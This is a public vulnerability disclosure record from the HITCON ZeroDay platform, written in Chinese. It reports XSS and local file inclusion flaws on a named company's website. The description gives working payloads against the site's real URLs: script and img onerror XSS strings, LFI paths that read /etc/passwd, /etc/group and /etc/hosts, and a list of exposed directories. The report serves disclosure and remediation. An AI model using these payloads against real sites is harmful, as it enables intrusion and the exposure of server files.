Vulnerability Detail Report
Vulnerability Overview
- ZDID: ZD-2021-00453
- 發信 Vendor: 巴爾桑波有限公司
- Title: 巴爾桑波有限公司 網站存在 LFI 與 XSS
- Introduction: 網站存在 LFI 與 XSS
處理狀態
目前狀態
-
新提交
-
已審核
-
已通報
-
未回報修補狀況
-
未複測
-
公開
處理歷程
- 2021/07/27 03:34:31 : 新提交 (由 BTtea 更新此狀態)
- 2021/07/27 23:37:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/28 12:41:17 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/28 12:41:17 : 審核完成 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/07/28 12:41:17 : 通報未回應 (由 HITCON ZeroDay 服務團隊 更新此狀態)
- 2021/09/26 03:00:02 : 公開 (由 HITCON ZeroDay 平台自動更新)
詳細資料
- ZDID:ZD-2021-00453
- 通報者:blacktea_player (BTtea)
- 風險:中
- 類型:本地檔案引入 (Local File Inclusion, LFI)
參考資料
漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution
相關網址
敘述
在 https://www.skinc.com.tw/index.php?page= 後面接上 "><img src=1 onerror=alert(1)> 即可觸發 xss
在 後台的 https://www.skinc.com.tw/admin/index.php?message= 加上<script>alert('xss test')</script> 即可觸發 xss
以下兩個網址都可以觸發 LFI
https://www.skinc.com.tw/index.php?page=
https://www.skinc.com.tw/admin/index.php?page=
以下payload接在參數後面皆可瀏覽資訊
/etc/passwd%00
/etc/group%00
/etc/hosts%00
有些資訊建議隱藏,尤其是這個,有些資料類似用LFI瀏覽可得到的資訊 https://www.skinc.com.tw/templates_c/
https://www.skinc.com.tw/upload/
https://www.skinc.com.tw/templates/
https://www.skinc.com.tw/common/
https://www.skinc.com.tw/assets/
https://www.skinc.com.tw/admin/js/tiny_mce/
https://www.skinc.com.tw/download/
修補建議
攻擊者可經由該漏洞竊取使用者身份,或進行掛碼、轉址等攻擊行為。
漏洞說明: OWASP - Cross-site Scripting (XSS)
https://www.owasp.org/index.php/Cross-site_Scripting_(XSS)
防護原則: OWASP - XSS (Cross Site Scripting) Prevention Cheat Sheet
https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting)_Prevention_Cheat_Sheet
防禦繞過方式: OWASP - XSS Filter Evasion Cheat Sheet
https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet
攻擊者可經由該漏洞取得後端系統檔案及網站程式原始碼等敏感資料。
漏洞說明: OWASP - Testing for Local File Inclusion
https://www.owasp.org/index.php/Testing_for_Local_File_Inclusion
Wikepedia 漏洞說明:
https://en.wikipedia.org/wiki/File_inclusion_vulnerability
OWASP Top 10 2007 - Malicious File Execution
https://www.owasp.org/index.php/Top_10_2007-Malicious_File_Execution